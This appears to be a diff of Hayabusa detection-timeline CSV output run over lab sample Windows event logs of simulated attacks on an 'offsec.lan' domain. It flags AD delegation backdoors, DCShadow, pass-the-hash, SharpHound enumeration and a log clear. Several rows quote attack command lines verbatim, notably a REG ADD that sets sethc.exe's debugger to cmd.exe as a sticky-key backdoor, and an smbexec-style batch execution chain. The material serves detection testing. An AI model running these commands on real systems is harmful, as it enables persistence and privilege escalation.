+2021-04-26 17:26:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:17:14.111 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx
+2021-04-26 18:17:37.439 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx
+2021-04-26 18:18:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx
+2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx
+2021-04-26 23:16:45.757 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx
+2021-04-26 23:16:47.267 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 7CF65FC7-CAF6-6086-930A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx
+2021-04-27 00:03:05.976 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx"
+2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx
+2021-04-27 00:16:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:04.047 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 20:04:03.495 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 20:04:03.502 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee2c3d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2847721c,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f93ef,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x28477800,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cbf9f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd4ec6,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ac4,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
